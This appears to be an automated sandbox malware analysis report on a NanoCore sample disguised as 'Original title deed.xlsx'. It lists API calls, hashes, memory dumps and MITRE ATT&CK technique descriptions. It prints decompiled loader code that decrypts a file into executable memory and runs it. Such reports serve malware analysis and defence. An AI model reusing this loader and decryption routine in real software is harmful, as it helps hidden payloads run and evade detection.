Instruction ID: 586f5652b4bc527dd74aa0c7a081951e1dbe09029706f17ed2024eca88b7ff7c
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 48523A35E50258EEEB64CBA4EC55BFDB7B5AF48700F20449AE618FA2A0D7705E80DF05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2444 Parent PID: 2404 vbc.exeCOMMON

Executed Functions

Function 003F13F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 003F1739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003F179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 003F1808, 003F180B

Memory Dump Source

Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: a8fedad9941d792e5080edb5dfdf8a537bbdcab9dc6e76b49b0abc93456983b5
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: C6E14921D5438CEDEB22CBE4EC16BFDBBB5AF04710F10409AE648FA191D7B10A84DB56

Uniqueness

Uniqueness Score: -1.00%

Function 003F091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 003F0A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 003F0BED

Memory Dump Source

Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 18ffa751e3d2f168fd21d27cabf4a62e278584417640ab3252a8b72a0c92a1b3
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: F8A1F130D1020DEFDF16CFE8D985BBDBBB1AF08315F20845AE615BA2A1D3B59A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 003F0034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 003F058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 003F05D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 003F08ED

Memory Dump Source

Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 9b42d49eb4a541ac7aa50f2151a854b8f0dbd06ac62000f5a0cc18720097384a
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: C3524B35A5025CEEEB65CB98EC51BFDB7B4AF44700F204496E608FA2A1D3B05E80DF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2460 Parent PID: 2444 vbc.exeCOMMON

Executed Functions

Function 01D6091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01D60A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01D60BED

Memory Dump Source

Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 8df8ac38aecbcee913bec7fb174f93ea5330f19d6a810a4658e6be7dc225d180
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 3BA10230D00209EFDF11CFE8D985BADBBB5FF08315F20855AE625BA2A0D3759A80DB10

Uniqueness

Uniqueness Score: -1.00%

Function 01D613F0, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01D61739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01D6179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 01D61808, 01D6180B

Memory Dump Source

Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 17ef0d56088fd3324df17fdeb9428d5d64948022ec8e35e64631543cfb36deef
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 4CE15C21D44398EEEF21CBE4DC15BEDBBB9AF44710F10409AE648FA1E1D7B50A84DB25

Uniqueness

Uniqueness Score: -1.00%

Function 10001120, Relevance: 4.7, APIs: 3, Instructions: 152
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t156;

				_v8 =  *0x10003028 ^ _t156;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 = (_v529 & 0x000000ff) >> 0x00000006 | (_v529 & 0x000000ff) << 0x00000002;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0x6a;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - _v536;
					_v529 = (_v529 & 0x000000ff) >> 0x00000007 | (_v529 & 0x000000ff) << 0x00000001;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001469(_v8 ^ _t156);
			}

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286

Memory Dump Source

Source File: 00000022.00000002.2369128015.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000022.00000002.2369119854.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.2369135188.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.2369142260.0000000010004000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
Instruction ID: 83d81e531b48bbb665f37a7df122501d88c9d55b6a80c66f86e06f7556a42c30
Opcode Fuzzy Hash: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
Instruction Fuzzy Hash: 03715174C462BC9ADB21CBA49C9CBECBFB09F5A201F0481C9E59C66286C6345FC4CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01D60034, Relevance: 3.7, APIs: 2, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 01D6058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01D605D3

Memory Dump Source

Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false

Similarity

API ID: Process$CreateMemoryRead
String ID:
API String ID: 2726527582-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 94f7c7d692c340dd9f84a6c4bb6634b6a7d115267d36dbe4c441c288cd57d9a5
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: DF523B35E50258AFEB60CBA8EC55BFDB7B5AF48700F204496E608FA2A0D3745E80DF55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Original title deed.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Original title deed.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General